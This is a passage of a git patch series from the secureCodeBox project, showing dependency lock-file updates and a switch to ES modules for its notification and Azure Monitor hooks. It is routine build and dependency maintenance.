"sha512-/1xYAC4MP/HEG+3duIhFr4ZQXR4sQXOIe+o6sdqzeykGLx6Upp/1p8MHqhINOvGeP7xyNHe7tsiJByc4SSVUxw==", - "requires": { - "follow-redirects": "^1.15.6", - "form-data": "^4.0.0", - "proxy-from-env": "^1.1.0" - } + "integrity": "sha1-x57Zf380y48robyXkLzDZkdLS3k=", + "dev": true }, "b4a": { "version": "1.6.7", @@ -1985,6 +2647,7 @@ "version": "1.0.2", "resolved": "https://registry.npmjs.org/call-bind-apply-helpers/-/call-bind-apply-helpers-1.0.2.tgz", "integrity": "sha512-Sp1ablJ0ivDkSzjcaJdxEunN5/XvksFJ2sMBFfq6x0ryhQV/2b/KwFe21cMpmHtPOSij8K99/wSfoEuTObmuMQ==", + "dev": true, "requires": { "es-errors": "^1.3.0", "function-bind": "^1.1.2" @@ -2019,6 +2682,7 @@ "version": "1.0.8", "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", + "dev": true, "requires": { "delayed-stream": "~1.0.0" } @@ -2040,12 +2704,14 @@ "delayed-stream": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", - "integrity": "sha1-3zrhmayt+31ECqrgsp4icrJOxhk=" + "integrity": "sha1-3zrhmayt+31ECqrgsp4icrJOxhk=", + "dev": true }, "dunder-proto": { "version": "1.0.1", "resolved": "https://registry.npmjs.org/dunder-proto/-/dunder-proto-1.0.1.tgz", "integrity": "sha512-KIN/nDJBQRcXw0MLVhZE9iQHmG68qAVIBg9CqmUYjmQIhgij9U5MFvrqkUL5FbtyyzZuOeOt0zdeRe4UY7ct+A==", + "dev": true, "requires": { "call-bind-apply-helpers": "^1.0.1", "es-errors": "^1.3.0", @@ -2064,17 +2730,20 @@ "es-define-property": { "version": "1.0.1", "resolved": "https://registry.npmjs.org/es-define-property/-/es-define-property-1.0.1.tgz", - "integrity": "sha512-e3nRfgfUZ4rNGL232gUgX06QNyyez04KdjFrF+LTRoOXmrOgFKDg4BCdsjW8EnT69eqdYGmRpJwiPVYNrCaW3g==" + "integrity": "sha512-e3nRfgfUZ4rNGL232gUgX06QNyyez04KdjFrF+LTRoOXmrOgFKDg4BCdsjW8EnT69eqdYGmRpJwiPVYNrCaW3g==", + "dev": true }, "es-errors": { "version": "1.3.0", "resolved": "https://registry.npmjs.org/es-errors/-/es-errors-1.3.0.tgz", - "integrity": "sha512-Zf5H2Kxt2xjTvbJvP2ZWLEICxA6j+hAmMzIlypy4xcBg1vKVnx89Wy0GbS+kf5cwCVFFzdCFh2XSCFNULS6csw==" + "integrity": "sha512-Zf5H2Kxt2xjTvbJvP2ZWLEICxA6j+hAmMzIlypy4xcBg1vKVnx89Wy0GbS+kf5cwCVFFzdCFh2XSCFNULS6csw==", + "dev": true }, "es-object-atoms": { "version": "1.1.1", "resolved": "https://registry.npmjs.org/es-object-atoms/-/es-object-atoms-1.1.1.tgz", "integrity": "sha512-FGgH2h8zKNim9ljj7dankFPcICIK9Cp5bm+c2gQSYePhpaG5+esrLODihIorn+Pe6FGJzWhXQotPv73jTaldXA==", + "dev": true, "requires": { "es-errors": "^1.3.0" } @@ -2083,6 +2752,7 @@ "version": "2.1.0", "resolved": "https://registry.npmjs.org/es-set-tostringtag/-/es-set-tostringtag-2.1.0.tgz", "integrity": "sha512-j6vWzfrGVfyXxge+O0x5sh6cvxAog0a/4Rdd2K36zCMV5eJ+/+tOAngRO8cODMNWbVRdVlmGZQL2YS3yR8bIUA==", + "dev": true, "requires": { "es-errors": "^1.3.0", "get-intrinsic": "^1.2.6", @@ -2090,6 +2760,40 @@ "hasown": "^2.0.2" } }, + "esbuild": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/esbuild/-/esbuild-0.25.6.tgz", + "integrity": "sha512-GVuzuUwtdsghE3ocJ9Bs8PNoF13HNQ5TXbEi2AhvVb8xU1Iwt9Fos9FEamfoee+u/TOsn7GUWc04lz46n2bbTg==", + "dev": true, + "requires": { + "@esbuild/aix-ppc64": "0.25.6", + "@esbuild/android-arm": "0.25.6", + "@esbuild/android-arm64": "0.25.6", + "@esbuild/android-x64": "0.25.6", + "@esbuild/darwin-arm64": "0.25.6", + "@esbuild/darwin-x64": "0.25.6", + "@esbuild/freebsd-arm64": "0.25.6", + "@esbuild/freebsd-x64": "0.25.6", + "@esbuild/linux-arm": "0.25.6", + "@esbuild/linux-arm64": "0.25.6", + "@esbuild/linux-ia32": "0.25.6", + "@esbuild/linux-loong64": "0.25.6", + "@esbuild/linux-mips64el": "0.25.6", + "@esbuild/linux-ppc64": "0.25.6", + "@esbuild/linux-riscv64": "0.25.6", + "@esbuild/linux-s390x": "0.25.6", + "@esbuild/linux-x64": "0.25.6", + "@esbuild/netbsd-arm64": "0.25.6", + "@esbuild/netbsd-x64": "0.25.6", + "@esbuild/openbsd-arm64": "0.25.6", + "@esbuild/openbsd-x64": "0.25.6", + "@esbuild/openharmony-arm64": "0.25.6", + "@esbuild/sunos-x64": "0.25.6", + "@esbuild/win32-arm64": "0.25.6", + "@esbuild/win32-ia32": "0.25.6", + "@esbuild/win32-x64": "0.25.6" + } + }, "escape-string-regexp": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-2.0.0.tgz", @@ -2111,15 +2815,11 @@ "to-regex-range": "^5.0.1" } }, - "follow-redirects": { - "version": "1.15.6", - "resolved": "https://registry.npmjs.org/follow-redirects/-/follow-redirects-1.15.6.tgz", - "integrity": "sha512-wWN62YITEaOpSK584EZXJafH1AGpO8RVgElfkuXbTOrPX4fIfOyEpW/CsiNd8JdYrAoOvafRTOEnvsO++qCqFA==" - }, "form-data": { "version": "4.0.3", "resolved": "https://registry.npmjs.org/form-data/-/form-data-4.0.3.tgz", "integrity": "sha512-qsITQPfmvMOSAdeyZ+12I1c+CKSstAFAwu+97zrnWAbIr5u8wfsExUzCesVLC8NgHuRUqNN4Zy6UPWUTRGslcA==", + "dev": true, "requires": { "asynckit": "^0.4.0", "combined-stream": "^1.0.8", @@ -2131,12 +2831,14 @@ "function-bind": { "version": "1.1.2", "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz", - "integrity": "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==" + "integrity": "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==", + "dev": true }, "get-intrinsic": { "version": "1.3.0", "resolved": "https://registry.npmjs.org/get-intrinsic/-/get-intrinsic-1.3.0.tgz", "integrity": "sha512-9fSjSaos/fRIVIp+xSJlE6lfwhES7LNtKaCBIamHsjr2na1BiABJPo0mOjjz8GJDURarmCPGqaiVg5mfjb98CQ==", + "dev": true, "requires": { "call-bind-apply-helpers": "^1.0.2", "es-define-property": "^1.0.1", @@ -2154,6 +2856,7 @@ "version": "1.0.1", "resolved": "https://registry.npmjs.org/get-proto/-/get-proto-1.0.1.tgz", "integrity": "sha512-sTSfBjoXBp89JvIKIefqw7U2CCebsc74kiY6awiGogKtoSGbgjYE/G/+l9sF3MWFPNc9IcoOC4ODfKHfxFmp0g==", + "dev": true, "requires": { "dunder-proto": "^1.0.1", "es-object-atoms": "^1.0.0" @@ -2162,7 +2865,8 @@ "gopd": { "version": "1.2.0", "resolved": "https://registry.npmjs.org/gopd/-/gopd-1.2.0.tgz", - "integrity": "sha512-ZUKRh6/kUFoAiTAtTYPZJ3hw9wNxx+BIBOijnlG9PnrJsCcSjs1wyyD6vJpaYtgnzDrKYRSqf3OO6Rfa93xsRg==" + "integrity": "sha512-ZUKRh6/kUFoAiTAtTYPZJ3hw9wNxx+BIBOijnlG9PnrJsCcSjs1wyyD6vJpaYtgnzDrKYRSqf3OO6Rfa93xsRg==", + "dev": true }, "graceful-fs": { "version": "4.2.11", @@ -2179,12 +2883,14 @@ "has-symbols": { "version": "1.1.0", "resolved": "https://registry.npmjs.org/has-symbols/-/has-symbols-1.1.0.tgz", - "integrity": "sha512-1cDNdwJ2Jaohmb3sg4OmKaMBwuC48sYni5HUw2DvsC8LjGTLK9h+eb1X6RyuOHe4hT0ULCW68iomhjUoKUqlPQ==" + "integrity": "sha512-1cDNdwJ2Jaohmb3sg4OmKaMBwuC48sYni5HUw2DvsC8LjGTLK9h+eb1X6RyuOHe4hT0ULCW68iomhjUoKUqlPQ==", + "dev": true }, "has-tostringtag": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/has-tostringtag/-/has-tostringtag-1.0.2.tgz", "integrity": "sha512-NqADB8VjPFLM2V0VvHUewwwsw0ZWBaIdgo+ieHtK3hasLz4qeCRjYcqfB6AQrBggRKppKF8L52/VqdVsO47Dlw==", + "dev": true, "requires": { "has-symbols": "^1.0.3" } @@ -2193,6 +2899,7 @@ "version": "2.0.2", "resolved": "https://registry.npmjs.org/hasown/-/hasown-2.0.2.tgz", "integrity": "sha512-0hJU9SCPvmMzIBdZFqNPXWa6dqh7WdH0cII9y+CyS8rG3nL48Bclra9HmKhVVUHyPWNH5Y7xDwAB7bfgSjkUMQ==", + "dev": true, "requires": { "function-bind": "^1.1.2" } @@ -2329,15 +3036,16 @@ "jsep": "^1.4.0" } }, - "lodash": { + "lodash-es": { "version": "4.17.21", - "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz", - "integrity": "sha512-v2kDEe57lecTulaDIuNTPy3Ry4gLGJ6Z1O3vE1krgXZNrsQ+LFTGHVxVjcXPs17LhbZVGedAJv8XZ1tvj5FvSg==" + "resolved": "https://registry.npmjs.org/lodash-es/-/lodash-es-4.17.21.tgz", + "integrity": "sha512-mKnC+QJ9pWVzv+C4/U3rRsHapFfHvQFoFB92e52xeyGMcX6/OlIl78je1u8vePzYZSkkogMPJ2yjxxsb89cxyw==" }, "math-intrinsics": { "version": "1.1.0", "resolved": "https://registry.npmjs.org/math-intrinsics/-/math-intrinsics-1.1.0.tgz", - "integrity": "sha512-/IXtbwEk5HTPyEwyKX6hGkYXxM9nbj64B+ilVJnC/R6B0pH5G4V3b0pVbL7DBj4tkhBAppbQUlf6F6Xl9LHu1g==" + "integrity": "sha512-/IXtbwEk5HTPyEwyKX6hGkYXxM9nbj64B+ilVJnC/R6B0pH5G4V3b0pVbL7DBj4tkhBAppbQUlf6F6Xl9LHu1g==", + "dev": true }, "micromatch": { "version": "4.0.8", @@ -2360,12 +3068,14 @@ "mime-db": { "version": "1.49.0", "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.49.0.tgz", - "integrity": "sha512-CIc8j9URtOVApSFCQIF+VBkX1RwXp/oMMOrqdyXSBXq5RWNEsRfyj1kiRnQgmNXmHxPoFIxOroKA3zcU9P+nAA==" + "integrity": "sha512-CIc8j9URtOVApSFCQIF+VBkX1RwXp/oMMOrqdyXSBXq5RWNEsRfyj1kiRnQgmNXmHxPoFIxOroKA3zcU9P+nAA==", + "dev": true }, "mime-types": { "version": "2.1.32", "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.32.tgz", "integrity": "sha512-hJGaVS4G4c9TSMYh2n6SQAGrC4RnfU+daP8G7cSCmaqNjiOoUY0VHCMS42pxnQmVF1GWwFhbHWn3RIxCqTmZ9A==", + "dev": true, "requires": { "mime-db": "1.49.0" } @@ -2431,11 +3141,6 @@ "integrity": "sha512-xceH2snhtb5M9liqDsmEw56le376mTZkEX/jEb/RxNFyegNul7eNslCXP9FDj/Lcu0X8KEyMceP2ntpaHrDEVA==", "dev": true }, - "proxy-from-env": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/proxy-from-env/-/proxy-from-env-1.1.0.tgz", - "integrity": "sha512-D+zkORCbA9f1tdWRK0RaCR3GPv50cMxcrz4X8k5LTSUD1Dkw47mKJEZQNunItRTkWwgtaUSo1RVFRIG9ZXiFYg==" - }, "pump": { "version": "3.0.3", "resolved": "https://registry.npmjs.org/pump/-/pump-3.0.3.tgz", diff --git a/hooks/notification/hook/package.json b/hooks/notification/hook/package.json index ca6edef208..cd76149803 100644 --- a/hooks/notification/hook/package.json +++ b/hooks/notification/hook/package.json @@ -4,8 +4,8 @@ "description": "secureCodeBox Hook for Notification", "main": "hook.js", "scripts": { - "lint": "npx tsc hook.ts --noEmit --skipLibCheck", - "build": "esbuild --platform=node --target=node22 --format=esm --outdir=./build/ --sourcemap *.ts" + "lint": "tsc hook.ts --noEmit --skipLibCheck", + "build": "esbuild --platform=node --target=node22 --format=esm --outdir=./build/ --sourcemap **/*.ts *.ts" }, "repository": { "type": "git", @@ -23,20 +23,20 @@ }, "homepage": "https://github.com/secureCodeBox/secureCodeBox#readme", "devDependencies": { + "@kubernetes/client-node": "^1.3.0", "@types/jest": "^30.0.0", - "@types/lodash": "^4.14.171", + "@types/lodash-es": "^4.17.12", "@types/mustache": "^4.1.2", "@types/node": "^22.16.2", "@types/nodemailer": "^6.4.4", - "typescript": "^5.8.3", - "@kubernetes/client-node": "^1.3.0", - "@types/nunjucks": "^3.1.5" + "@types/nunjucks": "^3.1.5", + "esbuild": "^0.25.6", + "typescript": "^5.8.3" }, "dependencies": { "@types/js-yaml": "^4.0.2", - "axios": "^1.6.0", "js-yaml": "^4.1.0", - "lodash": "^4.17.21", + "lodash-es": "^4.17.21", "nodemailer": "^6.10.1", "nunjucks": "^3.2.4" } diff --git a/hooks/notification/integration-tests/notification-hook-helm-values.yaml b/hooks/notification/integration-tests/notification-hook-helm-values.yaml index d5d223316e..32174743e9 100644 --- a/hooks/notification/integration-tests/notification-hook-helm-values.yaml +++ b/hooks/notification/integration-tests/notification-hook-helm-values.yaml @@ -11,4 +11,4 @@ notificationChannels: env: - name: SLACK_ENDPOINT - value: "http://http-webhook.integration-tests.svc.cluster.local/slack-notification" + value: "http://http-webhook.demo-targets.svc.cluster.local/slack-notification" From fef18a7682fa8f24039dace47d369c03dc577168 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Thu, 10 Jul 2025 15:44:53 +0200 Subject: [PATCH 110/137] Migrate azure monitor hook to esm and task --- .github/workflows/ci.yaml | 2 +- hooks/persistence-azure-monitor/Taskfile.yaml | 8 + .../persistence-azure-monitor/hook/Dockerfile | 6 - hooks/persistence-azure-monitor/hook/hook.js | 3 +- .../hook/hook.test.js | 2 +- .../hook/package-lock.json | 6237 ----------------- .../hook/package-lock.json.license | 3 - .../hook/package.json | 42 - .../hook/package.json.license | 3 - 9 files changed, 11 insertions(+), 6295 deletions(-) create mode 100644 hooks/persistence-azure-monitor/Taskfile.yaml delete mode 100644 hooks/persistence-azure-monitor/hook/package-lock.json delete mode 100644 hooks/persistence-azure-monitor/hook/package-lock.json.license delete mode 100644 hooks/persistence-azure-monitor/hook/package.json delete mode 100644 hooks/persistence-azure-monitor/hook/package.json.license diff --git a/.github/workflows/ci.yaml b/.github/workflows/ci.yaml index 431effaa1b..db2b5ec0fc 100644 --- a/.github/workflows/ci.yaml +++ b/.github/workflows/ci.yaml @@ -575,7 +575,7 @@ jobs: hook: - cascading-scans - generic-webhook - # - persistence-azure-monitor + - persistence-azure-monitor # - persistence-elastic # Fails on the CI due to insufficient cpu as mentioned in issue #1165 # - persistence-dependencytrack # - update-field-hook diff --git a/hooks/persistence-azure-monitor/Taskfile.yaml b/hooks/persistence-azure-monitor/Taskfile.yaml new file mode 100644 index 0000000000..e1a1e6cf1c --- /dev/null +++ b/hooks/persistence-azure-monitor/Taskfile.yaml @@ -0,0 +1,8 @@ +version: "3" + +includes: + hook: + taskfile: ../Taskfile.yaml + flatten: true + vars: + hookName: persistence-azure-monitor diff --git a/hooks/persistence-azure-monitor/hook/Dockerfile b/hooks/persistence-azure-monitor/hook/Dockerfile index 7ba93073c5..9bd4c97643 100644 --- a/hooks/persistence-azure-monitor/hook/Dockerfile +++ b/hooks/persistence-azure-monitor/hook/Dockerfile @@ -4,13 +4,7 @@ ARG baseImageTag ARG namespace -FROM node:22-alpine AS build -RUN mkdir -p /home/app -WORKDIR /home/app -COPY package.json package-lock.json ./ -RUN npm ci --omit=dev FROM ${namespace:-securecodebox}/hook-sdk-nodejs:${baseImageTag:-latest} WORKDIR /home/app/hook-wrapper/hook/ -COPY --from=build --chown=root:root --chmod=755 /home/app/node_modules/ ./node_modules/ COPY --chown=root:root --chmod=755 ./hook.js ./hook.js \ No newline at end of file diff --git a/hooks/persistence-azure-monitor/hook/hook.js b/hooks/persistence-azure-monitor/hook/hook.js index 486fcc3ef0..bc18139def 100644 --- a/hooks/persistence-azure-monitor/hook/hook.js +++ b/hooks/persistence-azure-monitor/hook/hook.js @@ -5,7 +5,7 @@ // Fixed settings for the script const monitorApiVersion = "2016-04-01"; -async function handle({ +export async function handle({ getFindings, scan, workspaceId = process.env["MONITOR_WORKSPACE_ID"], @@ -106,4 +106,3 @@ async function handle({ }, ); } -module.exports.handle = handle; diff --git a/hooks/persistence-azure-monitor/hook/hook.test.js b/hooks/persistence-azure-monitor/hook/hook.test.js index 25d3b462b6..a0648999d7 100644 --- a/hooks/persistence-azure-monitor/hook/hook.test.js +++ b/hooks/persistence-azure-monitor/hook/hook.test.js @@ -6,7 +6,7 @@ process.env["MONITOR_WORKSPACE_ID"] = "123123"; process.env["MONITOR_SHARED_KEY"] = "aGVsbG8taS1hbS1hLXRlc3Qta2V5"; process.env["MONITOR_LOGTYPE_PREFIX"] = "SCB"; -const { handle } = require("./hook"); +import { handle } from "./hook"; // Mock the fetch function const fetch = jest.fn( diff --git a/hooks/persistence-azure-monitor/hook/package-lock.json b/hooks/persistence-azure-monitor/hook/package-lock.json deleted file mode 100644 index 00c76c545e..0000000000 --- a/hooks/persistence-azure-monitor/hook/package-lock.json +++ /dev/null @@ -1,6237 +0,0 @@ -{ - "name": "@securecodebox/hook-persistence-azure-monitor", - "version": "1.0.0", - "lockfileVersion": 2, - "requires": true, - "packages": { - "": { - "name": "@securecodebox/hook-persistence-azure-monitor", - "version": "1.0.0", - "license": "Apache-2.0", - "devDependencies": { - "@types/jest": "^29.4.0", - "jest": "^29.3.1" - } - }, - "node_modules/@ampproject/remapping": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/@ampproject/remapping/-/remapping-2.2.0.tgz", - "integrity": "sha512-qRmjj8nj9qmLTQXXmaR1cck3UXSRMPrbsLJAasZpF+t3riI71BXed5ebIOYwQntykeZuhjsdweEc9BxH5Jc26w==", - "dev": true, - "dependencies": { - "@jridgewell/gen-mapping": "^0.1.0", - "@jridgewell/trace-mapping": "^0.3.9" - }, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@babel/code-frame": { - "version": "7.22.13", - "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.22.13.tgz", - "integrity": "sha512-XktuhWlJ5g+3TJXc5upd9Ks1HutSArik6jf2eAjYFyIOf4ej3RN+184cZbzDvbPnuTJIUhPKKJE3cIsYTiAT3w==", - "dev": true, - "dependencies": { - "@babel/highlight": "^7.22.13", - "chalk": "^2.4.2" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/code-frame/node_modules/ansi-styles": { - "version": "3.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-3.2.1.tgz", - "integrity": "sha512-VT0ZI6kZRdTh8YyJw3SMbYm/u+NqfsAxEpWO0Pf9sq8/e94WxxOpPKx9FR1FlyCtOVDNOQ+8ntlqFxiRc+r5qA==", - "dev": true, - "dependencies": { - "color-convert": "^1.9.0" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/@babel/code-frame/node_modules/chalk": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-2.4.2.tgz", - "integrity": "sha512-Mti+f9lpJNcwF4tWV8/OrTTtF1gZi+f8FqlyAdouralcFWFQWF2+NgCHShjkCb+IFBLq9buZwE1xckQU4peSuQ==", - "dev": true, - "dependencies": { - "ansi-styles": "^3.2.1", - "escape-string-regexp": "^1.0.5", - "supports-color": "^5.3.0" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/@babel/code-frame/node_modules/color-convert": { - "version": "1.9.3", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-1.9.3.tgz", - "integrity": "sha512-QfAUtd+vFdAtFQcC8CCyYt1fYWxSqAiK2cSD6zDB8N3cpsEBAvRxp9zOGg6G/SHHJYAT88/az/IuDGALsNVbGg==", - "dev": true, - "dependencies": { - "color-name": "1.1.3" - } - }, - "node_modules/@babel/code-frame/node_modules/color-name": { - "version": "1.1.3", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.3.tgz", - "integrity": "sha512-72fSenhMw2HZMTVHeCA9KCmpEIbzWiQsjN+BHcBbS9vr1mtt+vJjPdksIBNUmKAW8TFUDPJK5SUU3QhE9NEXDw==", - "dev": true - }, - "node_modules/@babel/code-frame/node_modules/escape-string-regexp": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-1.0.5.tgz", - "integrity": "sha512-vbRorB5FUQWvla16U8R/qgaFIya2qGzwDrNmCZuYKrbdSUMG6I1ZCGQRefkRVhuOkIGVne7BQ35DSfo1qvJqFg==", - "dev": true, - "engines": { - "node": ">=0.8.0" - } - }, - "node_modules/@babel/code-frame/node_modules/has-flag": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-3.0.0.tgz", - "integrity": "sha512-sKJf1+ceQBr4SMkvQnBDNDtf4TXpVhVGateu0t918bl30FnbE2m4vNLX+VWe/dpjlb+HugGYzW7uQXH98HPEYw==", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/@babel/code-frame/node_modules/supports-color": { - "version": "5.5.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-5.5.0.tgz", - "integrity": "sha512-QjVjwdXIt408MIiAqCX4oUKsgU2EqAGzs2Ppkm4aQYbjm+ZEWEcW4SfFNTr4uMNZma0ey4f5lgLrkB0aX0QMow==", - "dev": true, - "dependencies": { - "has-flag": "^3.0.0" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/@babel/compat-data": { - "version": "7.20.14", - "resolved": "https://registry.npmjs.org/@babel/compat-data/-/compat-data-7.20.14.tgz", - "integrity": "sha512-0YpKHD6ImkWMEINCyDAD0HLLUH/lPCefG8ld9it8DJB2wnApraKuhgYTvTY1z7UFIfBTGy5LwncZ+5HWWGbhFw==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/core": { - "version": "7.20.12", - "resolved": "https://registry.npmjs.org/@babel/core/-/core-7.20.12.tgz", - "integrity": "sha512-XsMfHovsUYHFMdrIHkZphTN/2Hzzi78R08NuHfDBehym2VsPDL6Zn/JAD/JQdnRvbSsbQc4mVaU1m6JgtTEElg==", - "dev": true, - "dependencies": { - "@ampproject/remapping": "^2.1.0", - "@babel/code-frame": "^7.18.6", - "@babel/generator": "^7.20.7", - "@babel/helper-compilation-targets": "^7.20.7", - "@babel/helper-module-transforms": "^7.20.11", - "@babel/helpers": "^7.20.7", - "@babel/parser": "^7.20.7", - "@babel/template": "^7.20.7", - "@babel/traverse": "^7.20.12", - "@babel/types": "^7.20.7", - "convert-source-map": "^1.7.0", - "debug": "^4.1.0", - "gensync": "^1.0.0-beta.2", - "json5": "^2.2.2", - "semver": "^6.3.0" - }, - "engines": { - "node": ">=6.9.0" - }, - "funding": { - "type": "opencollective", - "url": "https://opencollective.com/babel" - } - }, - "node_modules/@babel/core/node_modules/convert-source-map": { - "version": "1.9.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-1.9.0.tgz", - "integrity": "sha512-ASFBup0Mz1uyiIjANan1jzLQami9z1PoYSZCiiYW2FczPbenXc45FZdBZLzOT+r6+iciuEModtmCti+hjaAk0A==", - "dev": true - }, - "node_modules/@babel/generator": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/generator/-/generator-7.23.0.tgz", - "integrity": "sha512-lN85QRR+5IbYrMWM6Y4pE/noaQtg4pNiqeNGX60eqOfo6gtEj6uw/JagelB8vVztSd7R6M5n1+PQkDbHbBRU4g==", - "dev": true, - "dependencies": { - "@babel/types": "^7.23.0", - "@jridgewell/gen-mapping": "^0.3.2", - "@jridgewell/trace-mapping": "^0.3.17", - "jsesc": "^2.5.1" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/generator/node_modules/@jridgewell/gen-mapping": { - "version": "0.3.2", - "resolved": "https://registry.npmjs.org/@jridgewell/gen-mapping/-/gen-mapping-0.3.2.tgz", - "integrity": "sha512-mh65xKQAzI6iBcFzwv28KVWSmCkdRBWoOh+bYQGW3+6OZvbbN3TqMGo5hqYxQniRcH9F2VZIoJCm4pa3BPDK/A==", - "dev": true, - "dependencies": { - "@jridgewell/set-array": "^1.0.1", - "@jridgewell/sourcemap-codec": "^1.4.10", - "@jridgewell/trace-mapping": "^0.3.9" - }, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@babel/helper-compilation-targets": { - "version": "7.20.7", - "resolved": "https://registry.npmjs.org/@babel/helper-compilation-targets/-/helper-compilation-targets-7.20.7.tgz", - "integrity": "sha512-4tGORmfQcrc+bvrjb5y3dG9Mx1IOZjsHqQVUz7XCNHO+iTmqxWnVg3KRygjGmpRLJGdQSKuvFinbIb0CnZwHAQ==", - "dev": true, - "dependencies": { - "@babel/compat-data": "^7.20.5", - "@babel/helper-validator-option": "^7.18.6", - "browserslist": "^4.21.3", - "lru-cache": "^5.1.1", - "semver": "^6.3.0" - }, - "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0" - } - }, - "node_modules/@babel/helper-environment-visitor": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/helper-environment-visitor/-/helper-environment-visitor-7.22.20.tgz", - "integrity": "sha512-zfedSIzFhat/gFhWfHtgWvlec0nqB9YEIVrpuwjruLlXfUSnA8cJB0miHKwqDnQ7d32aKo2xt88/xZptwxbfhA==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-function-name": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/helper-function-name/-/helper-function-name-7.23.0.tgz", - "integrity": "sha512-OErEqsrxjZTJciZ4Oo+eoZqeW9UIiOcuYKRJA4ZAgV9myA+pOXhhmpfNCKjEH/auVfEYVFJ6y1Tc4r0eIApqiw==", - "dev": true, - "dependencies": { - "@babel/template": "^7.22.15", - "@babel/types": "^7.23.0" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-hoist-variables": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-hoist-variables/-/helper-hoist-variables-7.22.5.tgz", - "integrity": "sha512-wGjk9QZVzvknA6yKIUURb8zY3grXCcOZt+/7Wcy8O2uctxhplmUPkOdlgoNhmdVee2c92JXbf1xpMtVNbfoxRw==", - "dev": true, - "dependencies": { - "@babel/types": "^7.22.5" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-module-imports": { - "version": "7.18.6", - "resolved": "https://registry.npmjs.org/@babel/helper-module-imports/-/helper-module-imports-7.18.6.tgz", - "integrity": "sha512-0NFvs3VkuSYbFi1x2Vd6tKrywq+z/cLeYC/RJNFrIX/30Bf5aiGYbtvGXolEktzJH8o5E5KJ3tT+nkxuuZFVlA==", - "dev": true, - "dependencies": { - "@babel/types": "^7.18.6" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-module-transforms": { - "version": "7.20.11", - "resolved": "https://registry.npmjs.org/@babel/helper-module-transforms/-/helper-module-transforms-7.20.11.tgz", - "integrity": "sha512-uRy78kN4psmji1s2QtbtcCSaj/LILFDp0f/ymhpQH5QY3nljUZCaNWz9X1dEj/8MBdBEFECs7yRhKn8i7NjZgg==", - "dev": true, - "dependencies": { - "@babel/helper-environment-visitor": "^7.18.9", - "@babel/helper-module-imports": "^7.18.6", - "@babel/helper-simple-access": "^7.20.2", - "@babel/helper-split-export-declaration": "^7.18.6", - "@babel/helper-validator-identifier": "^7.19.1", - "@babel/template": "^7.20.7", - "@babel/traverse": "^7.20.10", - "@babel/types": "^7.20.7" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-plugin-utils": { - "version": "7.20.2", - "resolved": "https://registry.npmjs.org/@babel/helper-plugin-utils/-/helper-plugin-utils-7.20.2.tgz", - "integrity": "sha512-8RvlJG2mj4huQ4pZ+rU9lqKi9ZKiRmuvGuM2HlWmkmgOhbs6zEAw6IEiJ5cQqGbDzGZOhwuOQNtZMi/ENLjZoQ==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-simple-access": { - "version": "7.20.2", - "resolved": "https://registry.npmjs.org/@babel/helper-simple-access/-/helper-simple-access-7.20.2.tgz", - "integrity": "sha512-+0woI/WPq59IrqDYbVGfshjT5Dmk/nnbdpcF8SnMhhXObpTq2KNBdLFRFrkVdbDOyUmHBCxzm5FHV1rACIkIbA==", - "dev": true, - "dependencies": { - "@babel/types": "^7.20.2" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-split-export-declaration": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/helper-split-export-declaration/-/helper-split-export-declaration-7.22.6.tgz", - "integrity": 